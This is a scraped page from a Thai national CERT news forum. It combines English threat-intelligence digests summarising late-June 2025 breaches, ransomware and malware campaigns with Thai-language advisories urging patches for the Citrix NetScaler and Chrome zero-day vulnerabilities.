        "Over 1,200 Citrix NetScaler ADC and NetScaler Gateway appliances exposed online are unpatched against a critical vulnerability believed to be actively exploited, allowing threat actors to bypass authentication by hijacking user sessions. Tracked as CVE-2025-5777 and referred to as Citrix Bleed 2, this out-of-bounds memory read vulnerability results from insufficient input validation, enabling unauthenticated attackers to access restricted memory regions. A similar Citrix security flaw, dubbed "CitrixBleed," was exploited in ransomware attacks and breaches targeting governments in 2023 to hack NetScaler devices and move laterally across compromised networks."
        https://www.bleepingcomputer.com/news/security/over-1-200-citrix-servers-unpatched-against-critical-auth-bypass-flaw/
        https://www.helpnetsecurity.com/2025/06/30/citrixbleed-2-might-be-actively-exploited-cve-2025-5777/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-6543 Citrix NetScaler ADC and Gateway Buffer Overflow Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/06/30/cisa-adds-one-known-exploited-vulnerability-catalog
        https://securityaffairs.com/179476/hacking/u-s-cisa-adds-citrix-netscaler-flaw-to-its-known-exploited-vulnerabilities-catalog.html

      Malware

      • International Criminal Court Hit By Cyber Attack
        "The International Criminal Court (ICC) has revealed it detected a "new, sophisticated and targeted" cybersecurity incident late last week, adding it has now been contained. The incident was the second of its type against the ICC in recent years, it said in a statement. In 2023, the ICC announced it had been hacked, and the court struggled with the aftermath for weeks as it was disconnected from most systems that can access the internet."
        https://www.itnews.com.au/news/international-criminal-court-hit-by-cyber-attack-618324
      • 10 Things I Hate About Attribution: RomCom Vs. TransferLoader
        "Most of the time, delineating activities from distinct clusters and separating cybercrime from espionage can be done based on differing tactics, techniques, and procedures (TTPs), tooling, volume/scale, and targeting. However, in the case of TA829 and a cluster Proofpoint dubbed “UNK_GreenSec”, there is more ambiguity. TA829 is a cybercriminal actor that occasionally also conducts espionage aligned with Russian state interests, while UNK_GreenSec is an unusual cybercriminal cluster. TA829 overlaps with activity tracked by third-parties as RomCom, Void Rabisu, Storm-0978, CIGAR, Nebulous Mantis, Tropical Scorpius. The UNK_GreenSec cybercriminal cluster does not appear to align with publicly reported activity sets."
        https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader
      • Tracing Blind Eagle To Proton66
        "Trustwave SpiderLabs, which has been tracking Proton66 for the last several months, was able to make this connection by pivoting from Proton66-linked assets, which led to the identification of another active threat cluster relying on the same ASN infrastructure. Pivoting identified what is assessed to be one of its most recent and operationally active infrastructure clusters, characterized by strong interconnections across multiple domains and IP address clusters. This infrastructure exclusively leverages Visual Basic Script (VBS) files as its initial attack vector, relies heavily on free Dynamic DNS (DDNS) services, and deploys readily available Remote Access Trojans (RATs) as a second-stage malware."
        https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/
        https://thehackernews.com/2025/06/blind-eagle-uses-proton66-hosting-for.html
      • Hide Your RDP: Password Spray Leads To RansomHub Deployment
        "This intrusion began in November 2024 with a password spray attack targeting an internet-facing RDP server. Over the course of several hours, the threat actor attempted logins against multiple accounts using known malicious IPs (based on OSINT). Several hours later they then logged in via RDP with one of the previously compromised users and ran a series of discovery commands, including various net commands to enumerate users and computers. Credential access tools, specifically Mimikatz and Nirsoft CredentialsFileView, were used to extract stored credentials and interact with LSASS memory."
        https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/

      Breaches/Hacks/Leaks

      • Switzerland Says Government Data Stolen In Ransomware Attack
        "The government in Switzerland is informing that sensitive information from various federal offices has been impacted by a ransomware attack at the third-party organization Radix. The hackers have stolen data from Radix systems and later leaked it on the dark web, the Swiss government says. The exposed data is being analyzed with the help of the country’s National Cyber Security Centre (NCSC) to determine which government agencies are impacted and to what effect. “The foundation Radix has been targeted by a ransomware attack, during which data was stolen and encrypted,” announced the Swiss government."
        https://www.bleepingcomputer.com/news/security/switzerland-says-government-data-stolen-in-ransomware-attack/
      • Another Billing Software Vendor Hacked By Ransomware
        "Horizon Healthcare RCM is the latest revenue cycle management software vendor to report a health data breach involving ransomware and data theft. The firm's breach notification statement suggests that the company paid a ransom to prevent the disclosure of its stolen information. Horizon Healthcare RCM told Maine's attorney general in a breach report on June 27 that the incident affected six residents of that state."
        https://www.bankinfosecurity.com/another-billing-software-vendor-hacked-by-ransomware-a-28866
      • Norwegian Dam Valve Forced Open For Hours In Cyberattack
        "In a concerning incident this April, unidentified hackers managed to breach the control systems of a Norwegian dam. Reportedly, hackers breached the control systems of a Norwegian dam, causing its water valve to open fully. The incident occurred at the Lake Risevatnet dam, situated near the city of Svelgen in Southwest Norway. The valve remained open for four hours before the unauthorized activity was detected. According to the Norwegian energy news outlet, Energiteknikk, the hack did not pose a danger, as the water flow barely exceeded the dam’s minimum requirement. The valve released an additional 497 litres per second, but officials noted that the riverbed could handle a much larger volume, up to 20,000 litres per second."
        https://hackread.com/norwegian-dam-valve-forced-open-hours-in-cyberattack/
      • Swiss Nonprofit Health Organization Breached By Sarcoma Ransomware Group
        "The Swiss nonprofit health organization Radix has confirmed that its systems were breached by a ransomware group earlier this month. In a statement on Monday, the Zurich-based agency — which runs health promotion programs and online counseling services — said that the threat actor known as Sarcoma had published data stolen from its systems on a leak site. The Swiss government also issued a statement noting that "various federal offices" are among Radix's customers, and officials are evaluating what data was compromised. Radix has "no direct access" to government systems, the statement said."
        https://therecord.media/sarcoma-ransomware-breach-swiss-healthcare-nonprofit-radix

      General News

      • Third-Party Breaches Double, Creating Ripple Effects Across Industries
        "Supply chain risks remain top-of-mind for the vast majority of CISOs and cybersecurity leaders, according to SecurityScorecard. Their findings reveal that the way most organizations manage supply chain cyber risk isn’t keeping pace with expanding threats. Third-party involvement in breaches has doubled, rising from 15% to nearly 30%, according to the 2025 Verizon DBIR. A small group of third-party providers supports much of the world’s technology and infrastructure, creating an extreme concentration of risk. When even one of these providers is compromised, the ripple effects can disrupt thousands of organizations simultaneously."
        https://www.helpnetsecurity.com/2025/06/30/supply-chain-cyber-risks/
      • Are We Securing AI Like The Rest Of The Cloud?
        "In this Help Net Security interview, Chris McGranahan, Director of Security Architecture & Engineering at Backblaze, discusses how AI is shaping both offensive and defensive cybersecurity tactics. He talks about how AI is changing the threat landscape, the complications it brings to penetration testing, and what companies can do to stay ahead of AI-driven attacks. McGranahan also points out that human expertise remains essential, and we can’t depend on AI alone to protect cloud environments."
        https://www.helpnetsecurity.com/2025/06/30/chris-mcgranahan-backblaze-ai-cloud-security/
      • CISA And Partners Urge Critical Infrastructure To Stay Vigilant In The Current Geopolitical Environment
        "Today, CISA, in collaboration with the Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center (DC3), and the National Security Agency (NSA), released a Fact Sheet urging organizations to remain vigilant against potential targeted cyber operations by Iranian state-sponsored or affiliated threat actors. Over the past several months, there has been increasing activity from hacktivists and Iranian government-affiliated actors, which is expected to escalate due to recent events. These cyber actors often exploit targets of opportunity based on the use of unpatched or outdated software with known Common Vulnerabilities and Exposures or the use of default or common passwords on internet-connected accounts and devices."
        https://www.cisa.gov/news-events/alerts/2025/06/30/cisa-and-partners-urge-critical-infrastructure-stay-vigilant-current-geopolitical-environment
        https://www.cisa.gov/resources-tools/resources/iranian-cyber-actors-may-target-vulnerable-us-networks-and-entities-interest
        https://www.cisa.gov/sites/default/files/2025-06/joint-fact-sheet-Iranian-cyber-actors-may-target-vulnerable-US-networks-and-entities-of-interest-508c-1.pdf
        https://www.ic3.gov/CSA/2025/250630.pdf
        https://www.bleepingcomputer.com/news/security/us-warns-of-iranian-cyber-threats-on-critical-infrastructure/
        https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
        https://therecord.media/defense-vigilant-cyber-iran-israel
        https://www.infosecurity-magazine.com/news/iranian-cyber-threats-us/
      • Crypto Investment Fraud Ring Dismantled In Spain After Defrauding 5 000 Victims Worldwide
        "On 25 June 2025, the Spanish Guardia Civil, with the support of Europol and law enforcement from Estonia, France and the United States of America, arrested five members of a criminal network engaged in cryptocurrency investment fraud. The investigation identified that the perpetrators had laundered EUR 460 million in illicit profits stolen through crypto investment fraud from over 5 000 victims from around the world."
        https://www.europol.europa.eu/media-press/newsroom/news/crypto-investment-fraud-ring-dismantled-in-spain-after-defrauding-5-000-victims-worldwide
        https://www.bleepingcomputer.com/news/security/europol-helps-disrupt-540-million-crypto-investment-fraud-ring/
        https://thehackernews.com/2025/06/europol-dismantles-540-million.html
        https://www.infosecurity-magazine.com/news/taskforce-dismantles-euro460m/
        https://www.helpnetsecurity.com/2025/06/30/spain-crypto-fraud-arrests-2025/
      • Hired Hacker Assists Drug Cartel In Finding, Killing FBI Sources
        "The notorious Sinaloa Mexican drug cartel hired a hacker to conduct surveillance on persons of interest in the El Chapo case, which the cartel used to intimidate and kill potential FBI sources and witnesses, according a government report. The US Department of Justice's Office of Inspector General (OIG) on Thursday published an audit of the FBI's efforts to mitigate what it calls "ubiquitous technical surveillance" (UTS) and the threat it poses to the bureau's operations and investigations. The OIG defines UTS as widespread data collection and analytics "for the purpose of connecting people to things, events, or locations.""
        https://www.darkreading.com/cyberattacks-data-breaches/hacker-drug-cartel-killing-fbi-sources
        https://oig.justice.gov/sites/default/files/reports/25-065_t.pdf
        https://www.bankinfosecurity.com/doj-cartel-hacked-phones-cameras-to-track-fbi-informants-a-28863
        https://www.theregister.com/2025/06/30/sinaloa_drug_cartel_hired_cybersnoop/
      • Why Cybersecurity Should Come Before AI In Schools
        "Artificial intelligence has become the hot new tech across schools, and why wouldn't it be? It's helping students digest dense historical texts and improve book reports, and it's helping teachers simplify complex math concepts. Academia wants to show students how to embrace this powerful technology safely — and in line with school rules — because unfortunately, we've already begun to see the dark side of AI in the "real" world. But that raises a very serious question: What are our students learning about cybersecurity?"
        https://www.darkreading.com/endpoint-security/cybersecurity-before-ai-schools
      • Android Threats Rise Sharply, With Mobile Malware Jumping By 151% Since Start Of Year
        "The Android threat landscape in the first half of 2025 has entered a new phase. An era marked not just by volume, but by coordination and precision. Attackers are no longer simply throwing malware at users and hoping for results. They’re building ecosystems. Recent Malwarebytes threat research data reveals a sharp rise in mobile threats across the board, with malware targeting Android devices up 151%. We’ve seen a 147% increase in spyware, a broad category of apps that collect user data without consent, with a notable spike in Feb and March. In fact, the February/March levels represent nearly a 4x multiplication of the baseline."
        https://www.malwarebytes.com/blog/news/2025/06/android-threats-rise-sharply-with-mobile-malware-jumping-by-151-since-start-of-year
      • Hacker Conversations: Rachel Tobac And The Art Of Social Engineering
        "Social engineering is the art of persuasion. Mostly, this is a good thing. Misused, it can have disastrous effects. Rachel Tobac is a cyber social engineer. She is skilled at persuading people to do what she wants, rather than what they know they ought to do. Does this make her a hacker? “Yes. I am a hacker. I hack people. I hack people over the phone, via email, by text message, across social media – and occasionally in person.” Social engineers hack people rather than computers. She is now co-founder and CEO of SocialProof Security."
        https://www.securityweek.com/hacker-conversations-rachel-tobac-and-the-art-of-social-engineering/
      • 'Disgruntled' British IT Worker Jailed For Hacking Employer After Being Suspended
        "A British IT worker who launched what police described as a cyberattack against his employer after being suspended from work has been jailed for seven months. According to West Yorkshire Police, within hours of his suspension in July 2022, Mohammed Umar Taj attempted to take revenge on his employer. The unidentified firm, which has clients in the United Kingdom as well as in Germany and Bahrain, said it suffered “significant disruption” and lost at least £200,000 (about $275,000) due to the attack, as well as suffered reputational harm."
        https://therecord.media/uk-it-worker-jailed-hacking-former-employer
        https://www.theregister.com/2025/06/30/british_rogue_admin/
        https://www.infosecurity-magazine.com/news/it-worker-jailed-revenge-attack/
      • DOJ Raids 29 ‘laptop Farms’ In Operation Against North Korean IT Worker Scheme
        "Nearly 30 “laptop farms” across 16 states have been raided by U.S. law enforcement in recent months for their suspected role in a long-running North Korean IT worker scheme. The Justice Department on Monday announced a coordinated action that involved three indictments, one arrest, the seizure of 29 financial accounts and the shutdown of 21 websites alongside the laptop farm raids. FBI officials said the laptop farms allowed an undisclosed number of North Koreans to illegally work at more than 100 U.S. companies. The farms host work devices sent by legitimate companies who unwittingly hired North Koreans, allowing the employees to appear as if they are working from the U.S."
        https://therecord.media/doj-raids-laptop-farms-crackdown
        https://regmedia.co.uk/2025/06/30/doj-release.pdf
        https://cyberscoop.com/arrest-seizures-north-korean-it-workers-june-2025/
        https://www.bankinfosecurity.com/us-announces-crackdown-on-north-koreans-posing-as-workers-a-28864
        https://www.theregister.com/2025/06/30/us_north_korea_workers/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) cd5f785d-0c41-495a-93fd-9332bed8cec0-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA สหรัฐฯ เพิ่มช่องโหว่ Citrix NetScaler ลงใน Known Exploited Vulnerabilities Catalog

      1d6025df-a680-41b3-ac38-4ba6b1a1a8b0-image.png ช่องโหว่ในชิป Bluetooth เสี่ยงให้แฮกเกอร์ดักฟัง.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 114cfc2c-fec0-467d-a678-057236bf30e0-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • แฮกเกอร์เจาะระบบเขื่อนในนอร์เวย์ เปิดวาล์วปล่อยน้ำนาน 4 ชั่วโมง เหตุเพราะใช้รหัสผ่านอ่อนแอ

      3be0ca5a-0333-4e70-8af0-ef385b5c402f-image.png

      แฮกเกอร์เจาะระบบเขื่อนในนอร์เวย์ เปิดวาล.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 13c2e311-95f0-4f41-ad5d-53684a510476-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ประกาศแจ้งเตือนการโจมตีจากช่องโหว่ Zero-Day ในเบราว์เซอร์ Google Chrome

      เมื่อวันที่ 1 กรกฎาคม 2568 Cyber Security Agency of Singapore (CSA) ได้เผยแพร่เกี่ยวกับ บริษัท Google มีการอัปเดตด้านความปลอดภัยเพื่อแก้ไขช่องโหว่แบบ Zero-Day ในเบราว์เซอร์ Chrome ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ที่ได้รับผลกระทบควรดำเนินการอัปเดตเป็นเวอร์ชันล่าสุดโดยทันที

      โดยบริษัท Google ได้เผยแพร่การอัปเดตด้านความปลอดภัยเพื่อจัดการกับช่องโหว่แบบ Zero-Day ช่องโหว่หมายเลข CVE-2025-6554 ในเบราว์เซอร์ Chrome

      ผลกระทบ
      ช่องโหว่ดังกล่าวเป็นช่องโหว่ประเภท Type Confusion ที่เกิดขึ้นใน V8 JavaScript Engine ของ Google Chrome อาจทำให้ผู้โจมตีจากระยะไกลสามารถดำเนินการอ่าน/เขียนข้อมูลโดยไม่ได้รับอนุญาตผ่านหน้า HTML ที่ถูกสร้างขึ้นมา มีรายงานว่าช่องโหว่นี้กำลังถูกแสวงประโยชน์อย่างต่อเนื่อง

      ช่องโหว่ดังกล่าวส่งผลกระทบต่อ Google Chrome เวอร์ชันก่อนหน้า ดังต่อไปนี้

      • สำหรับระบบปฏิบัติการ Windows: เวอร์ชันก่อน 138.0.7204.96/.97
      • สำหรับระบบปฏิบัติการ Mac: เวอร์ชันก่อน 138.0.7204.92/.93
      • สำหรับระบบปฏิบัติการ Linux: เวอร์ชันก่อน 138.0.7204.96

      แนวทางการแก้ไข
      แนะนำให้ผู้ใช้งานเบราว์เซอร์ Chrome อัปเกรดเป็นเวอร์ชันล่าสุด นอกจากนี้ ควรเปิดใช้งานการอัปเดตอัตโนมัติในเบราว์เซอร์ Chrome เพื่อให้มั่นใจว่าโปรแกรมได้รับการอัปเดตอย่างทันท่วงที

      อ้างอิง
      https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-065/

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 83e16fb8-5c40-4914-b46a-399c76cb5302-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Cloudflare เปิดตัวระบบ Video Call เข้ารหัสแบบ End-to-End พร้อมเปิดซอร์สโค้ด "Orange Meets"

      ef2f1cc7-6b54-49bf-be40-355e62f2dce3-image.png

      Cloudflare เปิดตัวระบบ Video Call เข้ารหัสแบบ End-to-End พร้อมเ.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 3feda7ae-3d58-4125-a472-faaeb0043cc3-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ช่องโหว่ในชิป Bluetooth เสี่ยงให้แฮกเกอร์ดักฟังเสียงจากไมโครโฟนและโทรศัพท์มือถือ

      8cf535d7-1e7a-4f1c-b923-3caa591b7c75-image.png

      ช่องโหว่ในชิป Bluetooth เสี่ยงให้แฮกเกอร์ดักฟัง.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand e9da6158-dc0d-4aca-9d39-dc3188859b8f-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • การโจมตีที่เกิดขึ้นจริงจากช่องโหว่ร้ายแรงใน Citrix NetScaler ADC และ NetScaler Gateway

      เมื่อวันที่ 30 มิถุนายน 2568 Cyber Security Agency of Singapore (CSA) ได้เผยแพร่เกี่ยวกับกรณีที่ บริษัท Citrix ได้ออกประกาศอัปเดตด้านความปลอดภัย เพื่อแก้ไขช่องโหว่ร้ายแรงหลายรายการในผลิตภัณฑ์ NetScaler ADC และ NetScaler Gateway จึงขอแนะนำให้ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ที่ได้รับผลกระทบ ดำเนินการอัปเดตซอฟต์แวร์เป็นเวอร์ชันล่าสุดโดยทันที เพื่อป้องกันความเสี่ยงจากการถูกโจมตี

      บริษัท Citrix ได้เผยแพร่การอัปเดตด้านความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรง หมายเลข CVE-2025-5777 และ CVE-2025-6543 ซึ่งตรวจพบในผลิตภัณฑ์ NetScaler ADC และ NetScaler Gateway

      ผลกระทบของช่องโหว่

      • CVE-2025-5777
        ช่องโหว่ดังกล่าวเปิดโอกาสให้ผู้ไม่หวังดีสามารถข้ามกระบวนการยืนยันตัวตน รวมถึงระบบการยืนยันตัวตนแบบหลายปัจจัย (Multi-Factor Authentication: MFA) ได้ โดยอาศัยการโจรกรรมโทเคนของเซสชันที่ถูกเปิดเผย ซึ่งอาจส่งผลให้สามารถเข้าถึงระบบโดยไม่ได้รับอนุญาต

      • CVE-2025-6543
        ช่องโหว่ด้านหน่วยความจำนี้ อาจเปิดช่องให้ผู้โจมตีสามารถดำเนินการโจมตีแบบปฏิเสธการให้บริการ (Denial-of-Service: DoS) ส่งผลกระทบต่อความพร้อมใช้งานของระบบ

      สถานการณ์ปัจจุบัน
      จากรายงานล่าสุด พบว่าช่องโหว่ทั้งสองรายการดังกล่าว กำลังถูกนำไปใช้โจมตีจริงในหลายกรณี จึงถือเป็นภัยคุกคามที่มีความเร่งด่วนในการแก้ไข

      ผลิตภัณฑ์ที่ได้รับผลกระทบ
      ช่องโหว่ที่ตรวจพบส่งผลกระทบต่อผลิตภัณฑ์ในเวอร์ชันต่อไปนี้:

      • NetScaler ADC และ NetScaler Gateway เวอร์ชันก่อน 14.1-43.56
      • NetScaler ADC และ NetScaler Gateway เวอร์ชันก่อน 13.1-58.32
      • NetScaler ADC 13.1-FIPS และ 13.1-NDcPP เวอร์ชันก่อน 13.1-37.235
      • NetScaler ADC 12.1-FIPS เวอร์ชันก่อน 12.1-55.328

      แนวทางการแก้ไข
      ขอให้ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ดังกล่าว ดำเนินการอัปเดตระบบให้เป็นเวอร์ชันล่าสุดโดยทันที เพื่อป้องกันความเสี่ยงจากการถูกโจมตี และเพื่อเสริมสร้างความมั่นคงปลอดภัยของระบบ

      อ้างอิง
      https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-064

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 2c4efca1-334a-449e-8f2b-9a9076bffbed-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Cyber Threat Intelligence 30 June 2025

      Healthcare Sector

      • Feds Warn Patients, Healthcare Entities Of Phishing Scams
        "U.S. federal authorities are warning the public and healthcare sector organizations of email and fax phishing scams by fraudsters seeking to steal personal information about patients or payments. The warnings come as three large U.S. insurers continue to recover from recent cyberattacks. The FBI and its Internet Crime Complaint Center in a joint alert issued Friday warned the public about criminals impersonating legitimate health insurers and their investigative team members."
        https://www.bankinfosecurity.com/feds-warn-patients-healthcare-entities-phishing-scams-a-28852
        https://www.ic3.gov/PSA/2025/PSA250627
        https://www.theregister.com/2025/06/27/patients_providers_records_payment_scam/

      Vulnerabilities

      • Hackers Make Hay? Smart Tractors Vulnerable To Full Takeover
        "Researchers have figured out how to simultaneously spy on tens of thousands of smart tractors around the world, and even take full control over any of them. Smart farming is on the rise, in an effort to enhance farming practices by improving efficiency, reducing labor costs, and optimizing resources. Tractors are thus increasingly equipped with advanced technologies like GPS, sensors, and artificial intelligence, which enable them to operate autonomously in some cases, or be controlled remotely. In their most basic form, there's still someone inside the vehicle, but the tractor is connected to the cloud in order to get real-time weather data or location information, among other things."
        https://www.darkreading.com/cloud-security/hackers-hay-smart-tractors-vulnerable-takeover
      • How We Turned a Real Car Into a Mario Kart Controller By Intercepting CAN Data
        "If you went to our PTP Cyber Fest over the Infosec week you may have seen the PTP hack car being used as a games controller for the game SuperTuxKart (a free and open-source Mario Kart type game). You really could steer, accelerate and brake using the car, ‘driving’ the on screen kart! This was based on a silly idea I had last year as a way of making a more fun demo than just teaching people how to intercept and replay CAN messages. Here is the post that explains it."
        https://www.pentestpartners.com/security-blog/how-we-turned-a-real-car-into-a-mario-kart-controller-by-intercepting-can-data/
        https://www.theregister.com/2025/06/27/renault_clio_racing_controller/
      • Security Advisory: Airoha-Based Bluetooth Headphones And Earbuds
        "During our research on Bluetooth headphones and earbuds, we identified several vulnerabilities in devices that incorporate Airoha Systems on a Chip (SoCs). In this blog post, we briefly want to describe the vulnerabilities, point out their impact and provide some context to currently running patch delivery processes as described at this year’s TROOPERS Conference."
        https://insinuator.net/2025/06/airoha-bluetooth-security-vulnerabilities/
        https://www.bleepingcomputer.com/news/security/bluetooth-flaws-could-let-hackers-spy-through-your-microphone/

      Malware

      • Threat Spotlight: CVE-2025-5777: Citrix Bleed 2 Opens Old Wounds
        "Citrix released an advisory for CVE-2025-5777 affecting NetScaler ADC and Gateway devices, allowing attackers to hijack user sessions and bypass authentication. While no public reporting of exploitation for this vulnerability has emerged, ReliaQuest has observed indications of exploitation to gain initial access. Citrix recommends patching affected systems to the latest versions and terminating active sessions to mitigate session hijacking and further risks of exploitation."
        https://reliaquest.com/blog/threat-spotlight-citrix-bleed-2-vulnerability-in-netscaler-adc-gateway-devices/
        https://www.bleepingcomputer.com/news/security/citrix-bleed-2-flaw-now-believed-to-be-exploited-in-attacks/
        https://www.darkreading.com/vulnerabilities-threats/citrixbleed-2-active-exploitation
        https://www.infosecurity-magazine.com/news/citrixbleed-2-vulnerability/
        https://www.securityweek.com/evidence-suggests-exploitation-of-citrixbleed-2-vulnerability/
      • Case Of Attacks Targeting South Korean Web Servers Using MeshAgent And SuperShell
        "Lately, attacks on South Korean web servers utilizing MeshAgent and SuperShell have been identified. The presence of ELF-based malware at the malicious code distribution address suggests that the attackers are targeting not only Windows servers but also Linux servers. It is assumed that the attackers installed a web shell using a file upload vulnerability and used it to install additional payloads. Through reconnaissance and lateral movement, the attackers attempted to infect not only the compromised system but also other systems within the organization."
        https://asec.ahnlab.com/en/88627/
      • Scattered Spider Hackers Shift Focus To Aviation, Transportation Firms
        "Hackers associated with "Scattered Spider" tactics have expanded their targeting to the aviation and transportation industries after previously attacking insurance and retail sectors. These threat actors have employed a sector-by-sector approach, initially targeting retail companies, such as M&S and Co-op, in the United Kingdom and the United States and subsequently shifting their focus to insurance companies. While the threat actors were not officially named as responsible for insurance sector attacks at first, recent incidents have impacted Aflac, Erie Insurance, and Philadelphia Insurance Companies."
        https://www.bleepingcomputer.com/news/security/scattered-spider-hackers-shift-focus-to-aviation-transportation-firms/
        https://thehackernews.com/2025/06/fbi-warns-of-scattered-spiders.html
        https://securityaffairs.com/179413/cyber-crime/the-fbi-warns-that-scattered-spider-is-now-targeting-the-airline-sector.html
      • Scattered Spider’s Calculated Path From CFO To Compromise
        "“Scattered Spider” targets executive and administrative accounts, exploiting human trust and workflows to bypass multi-factor authentication (MFA) and infiltrate critical systems. The group showed technical sophistication by dumping NTDS.dit and harvesting over 1,400 secrets. By leveraging unmanaged virtual machines (VMs), ngrok, and privileged service principals, Scattered Spider maintained persistence while evading detection. To counter these threats, organizations should monitor privileged accounts, enforce strict identity verification protocols, implement hypervisor-level logging, conduct social engineering assessments, and train employees to recognize manipulation tactics."
        https://reliaquest.com/blog/scattered-spiders-calculated-path-from-cfo-to-compromise/
        https://www.darkreading.com/cloud-security/scattered-spider-cfo-scorched-earth-attack
        https://www.bankinfosecurity.com/teardown-how-scattered-spider-hacked-logistics-firm-a-28846
      • The New Face Of Remcos: Path Bypass And Masquerading
        "Since last year and well into this year, Remcos malware campaigns stayed very active, continually morphing to stay hidden. Attackers usually send phishing emails with malicious files like malicious shortcuts, scripts or documents. When a victim opens the file, it quietly drops the Remcos program and hides it in new folders with similar names to legitimate Windows system folders on the PC. Once installed, Remcos lets the attackers control the PC, steal passwords and record keystrokes. The malware keeps a backdoor open by setting up scheduled tasks or other sneaky tricks. This way, they stay on the system for a long time without being detected."
        https://www.forcepoint.com/blog/x-labs/remcos-malware-new-face
        https://hackread.com/remcos-malware-campaigns-hit-businesses-and-schools/
      • Fake DocuSign Email Hides Tricky Phishing Attempt
        "On my daily rounds, I encountered a phishing attempt that used a not completely unusual, yet clever delivery method. What began as a seemingly routine DocuSign notification turned into a multi-layered deception involving Webflow, a shady redirect, and a legitimate Google login page. Webflow is a visual website builder that allows designers and developers to create custom, responsive websites. It’s a no-code solution that allows users to visually design, build, and launch websites directly in the browser The attack all starts with an email claiming to be from a known contact, referencing a completed DocuSign document."
        https://www.malwarebytes.com/blog/news/2025/06/fake-docusign-email-hides-tricky-phishing-attempt
      • DeepSeek Deception: Sainbox RAT & Hidden Rootkit Delivery
        "Netskope Threat Labs has discovered a campaign using fake installers to deliver the Sainbox RAT and Hidden rootkit. During our threat hunting activities, we encountered multiple installers disguised as legitimate software, including WPS Office, Sogou, and DeepSeek. These installers were mainly MSI files that were delivered via phishing websites. Both the phishing pages and installers were in Chinese, indicating that the targets are Chinese speakers. We can attribute this attack to Silver Fox (a China-based adversary group) with medium confidence based on the TTPs, particularly the phishing websites, the fake installers for popular Chinese software, the use of Gh0stRAT variants, and the targeting of Chinese speakers."
        https://www.netskope.com/blog/deepseek-deception-sainbox-rat-hidden-rootkit-delivery
        https://thehackernews.com/2025/06/chinese-group-silver-fox-uses-fake.html
        https://www.securityweek.com/chinese-hackers-target-chinese-users-with-rat-rootkit/
      • Hive0154 Aka Mustang Panda Shifts Focus On Tibetan Community To Deploy Pubload Backdoor
        "In June 2025, IBM X-Force researchers discovered China-aligned threat actor, Hive0154, spreading Pubload malware featuring lure documents and filenames targeting the Tibetan community. The Tibetan sovereignty dispute is often invoked by Chinese threat groups in their cyber operations, with the latest campaign coinciding with activities leading up to a major event for the Tibetan community, the Dalai Lama's 90th birthday."
        https://www.ibm.com/think/x-force/hive0154-mustang-panda-shifts-focus-tibetan-community-deploy-pubload-backdoor
        https://thehackernews.com/2025/06/pubload-and-pubshell-malware-used-in.html
      • GIFTEDCROOK’s Strategic Pivot: From Browser Stealer To Data Exfiltration Platform During Critical Ukraine Negotiations
        "The Arctic Wolf® Labs team has discovered that the cyber-espionage group UAC-0226, known for utilising the infostealer GIFTEDCROOK, has significantly evolved its capabilities. It has transitioned the malware from a basic browser data stealer (which we’re referring to as v1), through two new upgrades (v1.2 and v1.3) into a robust intelligence-gathering tool. Analysis of early files from February 2025 suggests that the GIFTEDCROOK project began as a demo during that period. It subsequently matured and was put into production in March 2025, with new capabilities continuously being developed and added since then."
        https://arcticwolf.com/resources/blog-uk/giftedcrooks-strategic-pivot-from-browser-stealer-to-data-exfiltration-platform-during-critical-ukraine-negotiations/
        https://thehackernews.com/2025/06/giftedcrook-malware-evolves-from.html
      • Anubis Ransomware Targets Global Victims With Wiper Functionality
        "This blog provides a detailed technical analysis of Anubis ransomware, an emerging RaaS threat known for combining data encryption with an optional file-wiping feature that permanently destroys victim data. By mapping its behavior to the MITRE ATT&CK Enterprise framework, we explore the full attack chain, from initial access via spear-phishing to the use of ECIES-based encryption and file-wiping mechanisms that amplify impact."
        https://www.picussecurity.com/resource/blog/anubis-ransomware-targets-global-victims-with-wiper-functionality

      Breaches/Hacks/Leaks

      • Hawaiian Airlines Discloses Cyberattack, Flights Not Affected
        "Hawaiian Airlines, the tenth-largest commercial airline in the United States, is investigating a cyberattack that has disrupted access to some of its systems. With over 7,000 employees, 235 average daily flights, and a fleet of over 60 airplanes, Hawaiian Airlines connects Hawai'i with 15 U.S. mainland cities and 10 other destinations across Asia and the Pacific. The airline stated in a statement issued on Thursday morning that the incident didn't affect flight safety and has already contacted relevant authorities to assist in investigating the attack."
        https://www.bleepingcomputer.com/news/security/hawaiian-airlines-discloses-cyberattack-flights-not-affected/
        https://therecord.media/hawaiian-airlines-cyberattack-flights-safe
        https://cyberscoop.com/scattered-spider-aviation-hawaiian-airlines-cyberattack/
